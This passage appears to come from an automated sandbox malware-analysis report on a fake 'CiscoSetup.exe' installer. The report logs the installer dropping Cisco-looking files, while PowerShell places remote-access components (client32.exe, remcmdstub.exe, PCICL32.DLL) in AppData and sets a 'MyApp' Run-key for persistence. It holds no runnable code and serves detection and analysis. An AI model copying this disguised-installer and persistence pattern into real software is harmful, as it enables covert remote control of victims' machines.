                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\Uninstall.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\acfeedback.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpncommoncrypt.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-LQ9L3.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnapi.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\concrt140.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnagent.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-E5841.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\is-6U0C3.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-2OKLO.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Users\user\AppData\Local\Temp\is-577AP.tmp\_isetup\_setup64.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\boost_filesystem.dll (copy)Jump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\TCCTL32.DLLJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\PCICHEK.DLLJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-FJD72.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-UHIQE.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-Q5QKO.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-DLGKK.tmpJump to dropped file
                                  Source: C:\Users\user\Desktop\download\CiscoSetup.exeFile created: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-E1C9T.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-2UOIT.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\acwebhelper.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\acruntime.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-D3PAV.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\accurl.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-8FFCG.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-8SET5.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnva64-6.sys (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\csc_ui.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\boost_chrono.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\acciscossl.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-LRKED.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-D1NAI.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\vccorlib140.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\WebView2Loader.dll (copy)Jump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\AudioCapture.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-EKIDE.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-AQJIS.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\HTCTL32.DLLJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\boost_date_time.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\csc_ui.exe (copy)Jump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\remcmdstub.exeJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\PCICL32.DLLJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\msvcr100.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpndownloader.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\vcruntime140.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-KL0N9.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-J44M9.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpncommon.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_689C7030 ctl_open,LoadLibraryA,InitializeCriticalSection,CreateEventA,CreateEventA,CreateEventA,CreateEventA,WSAStartup,GetTickCount,CreateThread,SetThreadPriority,GetModuleFileNameA,GetPrivateProfileIntA,GetModuleHandleA,CreateMutexA,timeBeginPeriod,11_2_689C7030
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CiscoJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cisco\Cisco Secure Client for Windows.lnkJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MyAppJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MyAppJump to behavior

                                  Hooking and other Techniques for Hiding and Protection

                                  barindex
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_110251B0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,11_2_110251B0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_111575D0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,11_2_111575D0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_111575D0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,11_2_111575D0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_11025600 IsIconic,BringWindowToTop,GetCurrentThreadId,11_2_11025600
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_1110F600 IsIconic,GetTickCount,11_2_1110F600
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_111579D0 SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,11_2_111579D0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_1111F870 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,11_2_1111F870
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_1111F870 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,11_2_1111F870
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_110238D0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,11_2_110238D0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_110BFDD0 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,11_2_110BFDD0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_11023FB0 IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,11_2_11023FB0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_110CA3C0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,11_2_110CA3C0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_110CA3C0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,11_2_110CA3C0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_11110220 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,11_2_11110220
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_110251B0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,12_2_110251B0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_111575D0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,12_2_111575D0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_111575D0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,12_2_111575D0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_11025600 IsIconic,BringWindowToTop,GetCurrentThreadId,12_2_11025600
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_1110F600 IsIconic,GetTickCount,12_2_1110F600
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_111579D0 SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,12_2_111579D0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_1111F870 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,12_2_1111F870
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_1111F870 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,12_2_1111F870
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_110238D0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,12_2_110238D0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_110BFDD0 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,12_2_110BFDD0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_11023FB0 IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,12_2_11023FB0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_110CA3C0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,12_2_110CA3C0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_110CA3C0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,12_2_110CA3C0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_11110220 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,12_2_11110220
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_11029230 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,GetProcAddress,GetLastError,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,11_2_11029230
                                  Source: C:\Users\user\Desktop\download\CiscoSetup.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
